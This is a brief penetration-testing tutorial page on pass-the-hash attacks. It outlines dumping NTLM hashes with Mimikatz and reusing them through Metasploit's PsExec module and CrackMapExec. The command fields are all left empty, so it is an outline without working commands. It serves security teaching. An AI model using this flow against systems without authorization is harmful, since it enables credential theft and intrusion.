Pass-The-Hash Attacks
Pass-The-Hash
Pass-the-hash is an exploitation technique that involves capturing or harvesting NTLM hashes or clear-text passwords and utilizing them to authenticate with the target legitimately.
We can use multiple tools to facilitate a Pass-The-Hash attack:
Metasploit PsExec module
Crackmapexec
This technique will allow us to obtain access to the target system via legitimate credentials as opposed to obtaining access via service exploitation.
Attack Flow: Pass-the-Hash Attack
1. Locate User Hashes
Objective: Obtain LM and NTLM hash values of user accounts from the target server.
Tool: Mimikatz
Command:
Description: Use Mimikatz to dump user password hashes from the SAM database and extract hashes from memory.
2. Pass-the-Hash Attack Using Metasploit
Objective: Exploit the target server using the PsExec module with the obtained hash values.
Tool: Metasploit
Module: exploit/windows/smb/psexec
Commands:
Start Metasploit Console:
Select PsExec Module:
Configure Module Parameters:
Run the Exploit:
If Exploit Fails, Set Target Option:
Description: Use the PsExec module to execute a pass-the-hash attack with the LM and NTLM hashes to gain access to the target server.
3. Pass-the-Hash Attack Using CrackMapExec
Objective: Perform the pass-the-hash attack using CrackMapExec as an alternative method.
Tool: CrackMapExec
Commands:
Execute Pass-the-Hash Attack:
Execute Commands on the Server:
Description: Use CrackMapExec to perform the pass-the-hash attack and execute commands on the target server.
Hacker's Mantra:Hackers are seen as shadowy figures with superhuman powers that threaten civilization. - Mitch Kapor
Last updated
Was this helpful?